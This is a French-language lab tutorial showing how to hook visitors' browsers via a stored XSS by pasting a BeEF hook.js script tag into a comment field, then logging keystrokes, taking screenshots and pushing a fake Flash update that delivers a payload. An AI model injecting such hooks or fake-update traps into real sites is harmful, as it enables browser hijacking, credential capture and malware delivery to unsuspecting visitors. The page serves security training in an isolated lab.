bmweb.fr

Exemple — Faille XSS avec BeEF

Objectif et déroulement de l’attaque

  • Objectif : Utiliser le logiciel BEEF pour piéger un site web et exploiter les failles des navigateurs des visiteurs
  • Déroulement de l’attaque :
    • Démarrer le logiciel BEEF
    • Injecter le code de BEEF dans le site web
    • Attendre qu’un utilisateur se connecte
    • Utiliser BEEF pour exploiter les failles du navigateur web

Pré-requis et environnement

  • VM : Kali Linux avec le site vulnérable installé et Windows
  • Logiciels nécessaires : BEEF
  • IP machine Kali Linux (ifconfig) : 10.0.2.4
  • Dans le terminal, lancer les commandes suivantes pour démarrer le service mysql et le service Apache :
root@kali:~# service mysql start
root@kali:~# service apache2 start

Démarrer BeEF

  • Dans Linux : Applications > Exploitation Tools > Beef XSS :
Démarrer BeEF
  • La console s’ouvre et le programme BEEF se lance :
[*] Please wait as BeEF services are started.
[*] You might need to refresh your browser once it opens.
[*] UI URL: http://127.0.0.1:3000/ui/panel
[*] Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>
root@kali:~#
  • La ligne Hook indique à quelle adresse le serveur BEEF est accessible
  • La ligne Example indique le code à copier sur le site à piéger (remplacer 127.0.0.1 par l’adresse de la machine Kali Linux (pour le savoir, lancer ifconfig dans la console linux)
  • Dans le même temps, le navigateur web s’ouvre sur l’adresse du serveur BEEF :
    • Le login est : beef
    • Le mot de passe est : beef
Démarrer BeEF

Injecter le code généré par BeEF

  • Aller sur la machine Kali
  • Ouvrir le navigateur web et taper l’adresse du site web de Kali Linux :
http://10.0.2.4/demo
  • Aller dans le premier article et dans le champ commentaire, taper le code "example" de BEEF en remplaçant l’adresse 127.0.0.1 par celle de Kali Linux :
<script src="http://10.0.2.4:3000/hook.js"></script>
  • Taper sur [Entrée] pour faire exécuter le code par le site web

Se connecter à la page infectée depuis Windows

  • Aller sur la machine Windows
  • Ouvrir le navigateur web et aller sur la page du premier article
Se connecter à la page infectée depuis Windows

Exploiter la faille XSS avec BeEF

  • Sur la machine Kali Linux, aller sur le navigateur à la page ouverte par BEEF
  • Si vous ne vous êtes pas encore connecté(e), le login et le mot de passe sont : beef/beef
  • L’interface principale de BEEF avec à gauche les machines en ligne (Online) et celles hors-ligne (Offline) :
  • L’onglet "Details" contient : user-agent, le langage du navigateur, le système d’exploitation et les composants que contient le navigateur :
Exploiter la faille XSS avec BeEF
  • L’onglet "Logs" contient les actions de l’utilisateur, les caractères tapés (ici admin), … :
Exploiter la faille XSS avec BeEF
  • L’onglet "Commands" est un annuaire de toutes les commandes et les exploits utilisables :
Exploiter la faille XSS avec BeEF

BeEF > Envoyer une alerte sur le navigateur

  • Dans l’onglet "Commands", taper "Alert" puis [Entrée]
  • Personnaliser le message et cliquer sur [Envoyer] :
BeEF > Envoyer une alerte sur le navigateur
  • Sur le navigateur de la machine Windows, le message s’affiche tout seul :
BeEF > Envoyer une alerte sur le navigateur

BeEF > Faire une capture écran du navigateur

  • Dans l’onglet "Commands", taper "spyder" et [Execute] :
BeEF > Faire une capture écran du navigateur

BeEF > Piéger l’utilisateur avec une fausse mise à jour flash

  • Dans l’onglet "Commands", taper "flash" et [Execute] :
BeEF > Piéger l’utilisateur avec une fausse mise à jour flash
  • Vous pouvez personnaliser :
    • l’image de flash
    • le type de charge active
    • l’url de la charge active
  • Sur le navigateur de l’utilisateur s’affiche une fausse mise à jour de Flash Player piégée :
BeEF > Piéger l’utilisateur avec une fausse mise à jour flash
Haut de page